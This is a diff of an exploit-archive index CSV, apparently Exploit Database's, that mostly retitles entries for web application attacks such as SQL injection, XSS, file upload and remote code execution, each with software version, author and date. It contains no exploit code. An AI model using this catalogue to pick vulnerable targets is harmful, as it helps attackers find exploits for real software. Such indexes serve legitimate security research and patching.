18246,platforms/php/webapps/18246.txt,"Seotoaster - SQL Injection Admin Login Bypass",2011-12-16,"Stefan Schurtz",php,webapps,0 18247,platforms/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",multiple,webapps,0 18248,platforms/php/webapps/18248.pl,"mPDF 5.3 - File Disclosure",2011-12-16,ZadYree,php,webapps,0 @@ -25169,7 +25172,7 @@ id,file,description,date,author,platform,type,port 18260,platforms/jsp/webapps/18260.txt,"Barracuda Control Center 620 - Multiple Web Vulnerabilities",2011-12-21,Vulnerability-Lab,jsp,webapps,0 18261,platforms/php/webapps/18261.txt,"SpamTitan 5.08 - Multiple Vulnerabilities",2011-12-21,Vulnerability-Lab,php,webapps,0 18262,platforms/multiple/webapps/18262.txt,"Plone and Zope - Remote Command Execution (PoC)",2011-12-21,"Nick Miles",multiple,webapps,0 -18265,platforms/php/webapps/18265.txt,"Tiki Wiki CMS Groupware 8.2 - (snarf_ajax.php) Remote PHP Code Injection",2011-12-22,EgiX,php,webapps,0 +18265,platforms/php/webapps/18265.txt,"Tiki Wiki CMS Groupware 8.2 - 'snarf_ajax.php' Remote PHP Code Injection",2011-12-22,EgiX,php,webapps,0 18266,platforms/php/webapps/18266.py,"Open Conference/Journal/Harvester Systems 2.3.x - Multiple Remote Code Execution Vulnerabilities",2011-12-23,mr_me,php,webapps,0 18274,platforms/php/webapps/18274.txt,"OpenEMR 4 - Multiple Vulnerabilities",2011-12-25,Level,php,webapps,0 18276,platforms/php/webapps/18276.txt,"WordPress Plugin Mailing List - Arbitrary File Download",2011-12-26,6Scan,php,webapps,0 @@ -25186,7 +25189,7 @@ id,file,description,date,author,platform,type,port 18982,platforms/windows/webapps/18982.txt,"Hexamail Server 4.4.5 - Persistent Cross-Site Scripting",2012-06-04,modpr0be,windows,webapps,0 18308,platforms/php/webapps/18308.txt,"Typo3 4.5 < 4.7 - Remote Code Execution (Remote File Inclusion / Local File Inclusion)",2012-01-04,MaXe,php,webapps,0 18314,platforms/php/webapps/18314.txt,"Posse Softball Director CMS - SQL Injection",2012-01-04,"H4ckCity Security Team",php,webapps,0 -18983,platforms/php/webapps/18983.php,"Mnews 1.1 - (view.php) SQL Injection",2012-06-04,WhiteCollarGroup,php,webapps,0 +18983,platforms/php/webapps/18983.php,"Mnews 1.1 - 'view.php' SQL Injection",2012-06-04,WhiteCollarGroup,php,webapps,0 18979,platforms/php/webapps/18979.txt,"vanilla forums poll plugin 0.9 - Persistent Cross-Site Scripting",2012-06-03,"Henry Hoggard",php,webapps,0 18980,platforms/php/webapps/18980.txt,"Vanilla Forums 2.0.18.4 - Tagging Persistent Cross-Site Scripting",2012-06-03,"Henry Hoggard",php,webapps,0 18320,platforms/php/webapps/18320.txt,"Posse Softball Director CMS - 'team.php' Blind SQL Injection",2012-01-04,"Easy Laster",php,webapps,0 @@ -25222,7 +25225,7 @@ id,file,description,date,author,platform,type,port 18389,platforms/php/webapps/18389.txt,"Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting",2012-01-19,MaXe,php,webapps,0 18390,platforms/php/webapps/18390.txt,"WordPress Plugin ucan post 1.0.09 - Persistent Cross-Site Scripting",2012-01-19,"Gianluca Brindisi",php,webapps,0 18700,platforms/php/webapps/18700.txt,"e-ticketing - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 -18392,platforms/php/webapps/18392.php,"appRain CMF 0.1.5 - (Uploadify.php) Unrestricted Arbitrary File Upload",2012-01-19,EgiX,php,webapps,0 +18392,platforms/php/webapps/18392.php,"appRain CMF 0.1.5 - 'Uploadify.php' Unrestricted Arbitrary File Upload",2012-01-19,EgiX,php,webapps,0 18394,platforms/asp/webapps/18394.txt,"ICTimeAttendance - Authentication Bypass",2012-01-20,v3n0m,asp,webapps,0 18395,platforms/asp/webapps/18395.txt,"EasyPage - SQL Injection",2012-01-20,"Red Security TEAM",asp,webapps,0 18396,platforms/php/webapps/18396.sh,"WhatsApp Status Changer 0.2 - Exploit",2012-01-20,emgent,php,webapps,0 @@ -25258,11 +25261,11 @@ id,file,description,date,author,platform,type,port 18455,platforms/php/webapps/18455.txt,"osCommerce 3.0.2 - Persistent Cross-Site",2012-02-02,Vulnerability-Lab,php,webapps,0 18456,platforms/php/webapps/18456.txt,"Achievo 1.4.3 - Multiple Web Vulnerabilities",2012-02-02,Vulnerability-Lab,php,webapps,0 18464,platforms/php/webapps/18464.html,"GAzie 5.20 - Cross-Site Request Forgery",2012-02-05,"Giuseppe D'Inverno",php,webapps,0 -18465,platforms/php/webapps/18465.txt,"BASE 1.4.5 - (base_qry_main.php t_view) SQL Injection",2012-02-06,"a.kadir altan",php,webapps,0 +18465,platforms/php/webapps/18465.txt,"BASE 1.4.5 - 'base_qry_main.php t_view' SQL Injection",2012-02-06,"a.kadir altan",php,webapps,0 18466,platforms/php/webapps/18466.txt,"Tube Ace (Adult PHP Tube Script) - SQL Injection",2012-02-06,"Daniel Godoy",php,webapps,0 18467,platforms/php/webapps/18467.txt,"XRayCMS 1.1.1 - SQL Injection",2012-02-06,chap0,php,webapps,0 18468,platforms/php/webapps/18468.html,"Flyspray 0.9.9.6 - Cross-Site Request Forgery",2012-02-07,"Vaibhav Gupta",php,webapps,0 -18470,platforms/php/webapps/18470.txt,"Ananta Gazelle CMS - Update Statement SQL Injection",2012-02-08,hackme,php,webapps,0 +18470,platforms/php/webapps/18470.txt,"Gazelle CMS 1.0 - Update Statement SQL Injection",2012-02-08,hackme,php,webapps,0 18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - File Inclusion",2012-02-08,Vulnerability-Lab,multiple,webapps,0 18480,platforms/php/webapps/18480.txt,"Dolibarr 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,php,webapps,0 18483,platforms/php/webapps/18483.txt,"Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting",2012-02-12,"Avram Marius",php,webapps,0 @@ -25342,7 +25345,7 @@ id,file,description,date,author,platform,type,port 18650,platforms/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution",2012-03-23,muts,php,webapps,0 18651,platforms/asp/webapps/18651.txt,"Sitecom WLM-2501 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-03-23,"Ivano Binetti",asp,webapps,0 18652,platforms/php/webapps/18652.txt,"Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting",2012-03-23,"Ivano Binetti",php,webapps,0 -18655,platforms/php/webapps/18655.php,"PHPFox 3.0.1 - (ajax.php) Remote Command Execution",2012-03-23,EgiX,php,webapps,0 +18655,platforms/php/webapps/18655.php,"PHPFox 3.0.1 - 'ajax.php' Remote Command Execution",2012-03-23,EgiX,php,webapps,0 18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution (Metasploit)",2012-03-24,Metasploit,php,webapps,0 18660,platforms/php/webapps/18660.txt,"RIPS 0.53 - Multiple Local File Inclusion",2012-03-24,localh0t,php,webapps,0 18676,platforms/php/webapps/18676.txt,"BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,php,webapps,0 @@ -25401,7 +25404,7 @@ id,file,description,date,author,platform,type,port 18809,platforms/php/webapps/18809.txt,"GENU CMS 2012.3 - Multiple SQL Injections",2012-05-01,Vulnerability-Lab,php,webapps,0 18813,platforms/php/webapps/18813.txt,"opencart 1.5.2.1 - Multiple Vulnerabilities",2012-05-01,waraxe,php,webapps,0 18815,platforms/php/webapps/18815.txt,"STRATO NewsLetter Manager - Directory Traversal",2012-05-01,"Zero X",php,webapps,0 -18820,platforms/php/webapps/18820.php,"OpenConf 4.11 - (author/edit.php) Blind SQL Injection",2012-05-02,EgiX,php,webapps,0 +18820,platforms/php/webapps/18820.php,"OpenConf 4.11 - 'author/edit.php' Blind SQL Injection",2012-05-02,EgiX,php,webapps,0 18824,platforms/cgi/webapps/18824.txt,"Websense Triton - Multiple Vulnerabilities",2012-05-02,"Ben Williams",cgi,webapps,0 18822,platforms/php/webapps/18822.txt,"PHP-decoda - Cross-Site Scripting In Video Tag",2012-05-02,"RedTeam Pentesting",php,webapps,0 18827,platforms/php/webapps/18827.txt,"Baby Gekko CMS 1.1.5c - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-05-03,LiquidWorm,php,webapps,0 @@ -25449,8 +25452,8 @@ id,file,description,date,author,platform,type,port 18953,platforms/php/webapps/18953.txt,"Ganesha Digital Library 4.0 - Multiple Vulnerabilities",2012-05-30,X-Cisadane,php,webapps,0 18955,platforms/php/webapps/18955.txt,"Simple Web Content Management System 1.1 < 1.3 - Multiple SQL Injections",2012-05-30,loneferret,php,webapps,0 18957,platforms/php/webapps/18957.rb,"PHP Volunteer Management System 1.0.2 - Arbitrary File Upload (Metasploit)",2012-05-31,Metasploit,php,webapps,0 -18960,platforms/php/webapps/18960.txt,"NewsAdd 1.0 - (lerNoticia.php id) SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 -18961,platforms/php/webapps/18961.txt,"Supernews 2.6.1 - (noticias.php cat) SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 +18960,platforms/php/webapps/18960.txt,"NewsAdd 1.0 - 'lerNoticia.php id' SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 +18961,platforms/php/webapps/18961.txt,"Supernews 2.6.1 - 'noticias.php cat' SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 18970,platforms/php/webapps/18970.txt,"Membris 2.0.1 - Multiple Vulnerabilities",2012-06-01,Dr.abolalh,php,webapps,0 18965,platforms/php/webapps/18965.html,"4PSA VoIPNow Professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps,0 18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Persistent Cross-Site Scripting",2012-06-02,"Henry Hoggard",php,webapps,0 @@ -25463,12 +25466,12 @@ id,file,description,date,author,platform,type,port 18994,platforms/php/webapps/18994.php,"WordPress Plugin Font Uploader 1.2.4 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18997,platforms/php/webapps/18997.php,"WordPress Plugin MM Forms Community 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18998,platforms/php/webapps/18998.php,"WordPress Plugin Gallery 3.06 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 -18999,platforms/php/webapps/18999.php,"SN News 1.2 - (visualiza.php) SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0 +18999,platforms/php/webapps/18999.php,"SN News 1.2 - 'visualiza.php' SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0 19012,platforms/php/webapps/19012.txt,"WordPress Plugin Front File Manager 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0 19013,platforms/php/webapps/19013.txt,"WordPress Plugin Easy Contact Forms Export 1.1.0 - Information Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 19005,platforms/php/webapps/19005.txt,"SN News 1.2 - '/admin/loger.php' Authentication Bypass",2012-06-07,"Yakir Wizman",php,webapps,0 19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Persistent Cross-Site Scripting",2012-06-06,"Henry Hoggard",php,webapps,0 -19007,platforms/php/webapps/19007.php,"PHPNet 1.8 - (ler.php) SQL Injection",2012-06-07,WhiteCollarGroup,php,webapps,0 +19007,platforms/php/webapps/19007.php,"PHPNet 1.8 - 'ler.php' SQL Injection",2012-06-07,WhiteCollarGroup,php,webapps,0 19008,platforms/php/webapps/19008.php,"WordPress Plugin Front End Upload 0.5.3 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 19009,platforms/php/webapps/19009.php,"WordPress Plugin Omni Secure Files 0.1.13 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 19016,platforms/php/webapps/19016.txt,"WordPress Plugin PICA Photo Gallery 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 @@ -25571,15 +25574,15 @@ id,file,description,date,author,platform,type,port 19864,platforms/php/webapps/19864.txt,"VamCart 0.9 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19865,platforms/php/webapps/19865.txt,"PBBoard 2.1.4 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19898,platforms/php/webapps/19898.txt,"Forum Oxalis 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps,0 -20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - (products_map.php symb Parameter) Cross-Site Scripting",2012-07-21,muts,php,webapps,0 +20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - 'products_map.php symb Parameter' Cross-Site Scripting",2012-07-21,muts,php,webapps,0 19927,platforms/php/webapps/19927.html,"Nwahy Articles 2.2 - Cross-Site Request Forgery (Add Admin)",2012-07-18,DaOne,php,webapps,0 19985,platforms/php/webapps/19985.txt,"iBoutique 4.0 - 'key' Parameter SQL Injection",2012-07-20,"SecPod Research",php,webapps,0 20011,platforms/windows/webapps/20011.js,"SolarWinds orion network performance monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0 20029,platforms/php/webapps/20029.rb,"EGallery - Arbitrary .PHP File Upload (Metasploit)",2012-07-23,Metasploit,php,webapps,0 -20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - (statusFilter.php q Parameter) SQL Injection",2012-07-22,muts,php,webapps,0 +20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php q Parameter' SQL Injection",2012-07-22,muts,php,webapps,0 20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution",2012-07-22,muts,asp,webapps,0 20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0 -20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - (blocked.php id Parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0 +20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - 'blocked.php id Parameter' Blind SQL Injection",2012-07-23,muts,linux,webapps,0 20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 - Blind SQL Injection Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0 20055,platforms/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 - HTML Injection",2012-07-23,"Daniel Godoy",php,webapps,0 20062,platforms/php/webapps/20062.py,"Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,php,webapps,0 @@ -25587,7 +25590,7 @@ id,file,description,date,author,platform,type,port 20083,platforms/php/webapps/20083.txt,"WordPress Plugin Front End Upload 0.5.4.4 - Arbitrary .PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0 20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor",2012-07-24,muts,php,webapps,0 20111,platforms/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload (Metasploit)",2012-07-27,Metasploit,php,webapps,0 -20123,platforms/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 - (deptUploads_data.php groupid Parameter) Blind SQL Injection",2012-07-30,Kc57,php,webapps,0 +20123,platforms/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php groupid Parameter' Blind SQL Injection",2012-07-30,Kc57,php,webapps,0 20124,platforms/windows/webapps/20124.txt,"Dr. Web Control Center 6.00.3.201111300 - Cross-Site Scripting",2012-07-31,"Oliver Karow",windows,webapps,0 20158,platforms/php/webapps/20158.txt,"PHP-Nuke 1.0/2.5 - Administrative Privileges",2000-08-21,bruj0,php,webapps,0 20166,platforms/php/webapps/20166.txt,"Joomla! Component 'com_niceajaxpoll' 1.3.0 - SQL Injection",2012-08-01,NLSecurity,php,webapps,0 @@ -25678,7 +25681,7 @@ id,file,description,date,author,platform,type,port 20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance - learn-msg.cgi Command Injection (Metasploit)",2012-08-22,Metasploit,cgi,webapps,0 20671,platforms/php/webapps/20671.html,"PG Portal Pro - Cross-Site Request Forgery",2012-08-20,Noxious,php,webapps,0 20672,platforms/php/webapps/20672.py,"Hivemail Webmail - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 -20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - (index.php id Parameter) SQL Injection",2012-08-20,DaOne,php,webapps,0 +20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - 'index.php id Parameter' SQL Injection",2012-08-20,DaOne,php,webapps,0 20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary .PHP File Upload (Metasploit)",2012-08-22,Metasploit,php,webapps,0 20675,platforms/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Persistent Cross-Site Scripting",2012-08-20,"Shai rod",php,webapps,0 20677,platforms/windows/webapps/20677.txt,"IOServer 1.0.18.0 - Directory Traversal",2012-08-20,hinge,windows,webapps,0 @@ -25700,7 +25703,7 @@ id,file,description,date,author,platform,type,port 20855,platforms/php/webapps/20855.txt,"Wiki Web Help 0.3.9 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0 20856,platforms/php/webapps/20856.txt,"XWiki 4.2-milestone-2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0 20857,platforms/php/webapps/20857.txt,"web@all CMS 2.0 - Multiple Vulnerabilities",2012-08-27,LiquidWorm,php,webapps,0 -20859,platforms/php/webapps/20859.txt,"vlinks 2.0.3 - (site.php id Parameter) SQL Injection",2012-08-27,JIKO,php,webapps,0 +20859,platforms/php/webapps/20859.txt,"vlinks 2.0.3 - 'site.php id Parameter' SQL Injection",2012-08-27,JIKO,php,webapps,0 20862,platforms/php/webapps/20862.txt,"WordPress Plugin Count Per Day 3.2.3 - Cross-Site Scripting",2012-08-27,Crim3R,php,webapps,0 20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 - (products_name_de) Script Insertion",2012-08-27,LiquidWorm,php,webapps,0 20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload",2012-08-27,"Sense of Security",asp,webapps,0 @@ -25920,7 +25923,7 @@ id,file,description,date,author,platform,type,port 21779,platforms/php/webapps/21779.txt,"WoltLab Burning Board 2.0 - SQL Injection",2002-09-09,Cano2,php,webapps,0 21780,platforms/php/webapps/21780.txt,"phpGB 1.1 - HTML Injection",2002-09-09,ppp-design,php,webapps,0 21783,platforms/php/webapps/21783.txt,"PHPGB 1.1/1.2 - PHP Code Injection",2002-09-09,ppp-design,php,webapps,0 -21786,platforms/php/webapps/21786.php,"Blog Mod 0.1.9 - (index.php month Parameter) SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 +21786,platforms/php/webapps/21786.php,"Blog Mod 0.1.9 - 'index.php month Parameter' SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 21802,platforms/cgi/webapps/21802.txt,"Lycos HTMLGear - guestGear CSS HTML Injection",2002-09-17,"Matthew Murphy",cgi,webapps,0 21809,platforms/php/webapps/21809.txt,"Web Help Desk by SolarWinds - Persistent Cross-Site Scripting",2012-10-08,loneferret,php,webapps,0 21811,platforms/php/webapps/21811.txt,"SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-19,"DarC KonQuest",php,webapps,0 @@ -25988,7 +25991,7 @@ id,file,description,date,author,platform,type,port 21990,platforms/php/webapps/21990.txt,"airVisionNVR 1.1.13 - readfile() Disclosure / SQL Injection",2012-10-15,pennyGrit,php,webapps,0 21992,platforms/hardware/webapps/21992.txt,"BigPond 3G21WB - Multiple Vulnerabilities",2012-10-15,"Roberto Paleari",hardware,webapps,0 21995,platforms/cgi/webapps/21995.txt,"CuteCast 1.2 - User Credential Disclosure",2002-11-07,Zero-X,cgi,webapps,0 -22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - (albums.php album Parameter) SQL Injection",2012-10-16,Zixem,php,webapps,0 +22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - 'albums.php album Parameter' SQL Injection",2012-10-16,Zixem,php,webapps,0 22004,platforms/php/webapps/22004.txt,"Joomla! Component 'com_icagenda' - 'id' Parameter Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0 22005,platforms/hardware/webapps/22005.txt,"visual tools dvr 3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0 22009,platforms/php/webapps/22009.txt,"EZ Systems HTTPBench 1.1 - Information Disclosure",2002-11-11,"Tacettin Karadeniz",php,webapps,0 @@ -26567,7 +26570,7 @@ id,file,description,date,author,platform,type,port 23558,platforms/php/webapps/23558.txt,"PHPix 2.0.3 - Arbitrary Command Execution",2004-01-20,"Max Stepanov",php,webapps,0 23561,platforms/asp/webapps/23561.txt,"DUware Software - Multiple Vulnerabilities",2004-01-20,"Security Corporation",asp,webapps,0 23571,platforms/asp/webapps/23571.txt,"SelectSurvey CMS - 'ASP.NET' Arbitrary File Upload",2012-12-21,040,asp,webapps,0 -23572,platforms/hardware/webapps/23572.txt,"YeaLink IP Phone SIP-TxxP firmware 9.70.0.100 - Multiple Vulnerabilities",2012-12-21,xistence,hardware,webapps,0 +23572,platforms/hardware/webapps/23572.txt,"YeaLink IP Phone SIP-TxxP Firmware 9.70.0.100 - Multiple Vulnerabilities",2012-12-21,xistence,hardware,webapps,0 23573,platforms/php/webapps/23573.txt,"banana dance b.2.6 - Multiple Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23575,platforms/php/webapps/23575.txt,"Elite Bulletin Board 2.1.21 - Multiple SQL Injections",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23599,platforms/php/webapps/23599.txt,"Gallery 1.3.x/1.4 - Remote Global Variable Injection",2004-01-26,"Bharat Mediratta",php,webapps,0 @@ -26860,7 +26863,7 @@ id,file,description,date,author,platform,type,port 24198,platforms/asp/webapps/24198.txt,"Virtual Programming VP-ASP Shoperror Script 4/5 - Cross-Site Scripting",2004-06-14,"Thomas Ryan",asp,webapps,0 24199,platforms/php/webapps/24199.txt,"Invision Power Board 1.3 - SSI.php Cross-Site Scripting",2004-06-14,"IMAN Sharafoddin",php,webapps,0 24201,platforms/php/webapps/24201.txt,"PHP-Charts - Arbitrary PHP Code Execution",2013-01-18,AkaStep,php,webapps,0 -24202,platforms/hardware/webapps/24202.txt,"Linksys WRT54GL (Firmware 4.30.15 build 2) - Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps,0 +24202,platforms/hardware/webapps/24202.txt,"Linksys WRT54GL Firmware 4.30.15 build 2 - Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps,0 24203,platforms/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Command Execution",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - 'module_db.php' Remote File Inclusion",2004-06-15,loofus,php,webapps,0 @@ -26892,7 +26895,7 @@ id,file,description,date,author,platform,type,port 24257,platforms/php/webapps/24257.txt,"JAWS 0.2/0.3 - 'index.php' action Parameter Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0 24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - comersus_gatewayPayPal.asp Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0 24261,platforms/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 - comersus_message.asp Cross-Site Scripting",2004-07-07,"Thomas Ryan",asp,webapps,0 -24269,platforms/php/webapps/24269.txt,"NConf 1.3 - (detail.php detail_admin_items.php id Parameter) SQL Injection",2013-01-21,haidao,php,webapps,0 +24269,platforms/php/webapps/24269.txt,"NConf 1.3 - 'detail.php detail_admin_items.php id Parameter' SQL Injection",2013-01-21,haidao,php,webapps,0 24270,platforms/php/webapps/24270.txt,"NConf 1.3 - Arbitrary File Creation",2013-01-21,haidao,php,webapps,0 24357,platforms/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - Blog_Exec.php Cross-Site Scripting",2004-08-07,"befcake beefy",php,webapps,0 24274,platforms/php/webapps/24274.pl,"phpBB 2.0.x - viewtopic.php PHP Script Injection",2004-07-12,"sasan hezarkhani",php,webapps,0 @@ -26981,21 +26984,21 @@ id,file,description,date,author,platform,type,port 24433,platforms/php/webapps/24433.txt,"PHP weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 24435,platforms/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps,0 24436,platforms/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal",2013-01-29,Vulnerability-Lab,php,webapps,0 -24438,platforms/php/webapps/24438.txt,"DataLife Engine 9.7 - (preview.php) PHP Code Injection",2013-01-28,EgiX,php,webapps,0 +24438,platforms/php/webapps/24438.txt,"DataLife Engine 9.7 - 'preview.php' PHP Code Injection",2013-01-28,EgiX,php,webapps,0 24439,platforms/freebsd/webapps/24439.txt,"pfSense UTM Platform 2.0.1 - Cross-Site Scripting",2013-01-29,"Dimitris Strevinas",freebsd,webapps,0 24442,platforms/hardware/webapps/24442.txt,"D-Link DCS Cameras - Multiple Vulnerabilities",2013-01-31,"Roberto Paleari",hardware,webapps,0 24443,platforms/hardware/webapps/24443.txt,"Buffalo TeraStation TS-Series - Multiple Vulnerabilities",2013-01-31,"Andrea Fabrizi",hardware,webapps,0 24445,platforms/php/webapps/24445.txt,"Simple Machine Forum 2.0.x < 2.0.4 - File Disclosure / Directory Traversal",2013-02-04,NightlyDev,php,webapps,0 24449,platforms/jsp/webapps/24449.txt,"Cisco Unity Express - Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",jsp,webapps,0 24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0 -24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - (config.php question Parameter) SQL Injection",2013-02-05,kallimero,php,webapps,0 +24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - 'config.php question Parameter' SQL Injection",2013-02-05,kallimero,php,webapps,0 24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 / DIR-300 (rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0 24454,platforms/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps,0 24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0 24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,php,webapps,0 24462,platforms/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,php,webapps,0 24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0 -24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 - (cubecart.class.php) PHP Object Injection",2013-02-07,EgiX,php,webapps,0 +24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 - 'cubecart.class.php' PHP Object Injection",2013-02-07,EgiX,php,webapps,0 24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0 24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php id Parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 24472,platforms/php/webapps/24472.txt,"Easy Live Shop System - SQL Injection",2013-02-10,"Ramdan Yantu",php,webapps,0 @@ -27008,9 +27011,9 @@ id,file,description,date,author,platform,type,port 24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x / 5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0 24483,platforms/hardware/webapps/24483.txt,"TP-Link - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0 24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0 -24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - (install.php) Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 +24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - 'install.php' Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php id Parameter' SQL 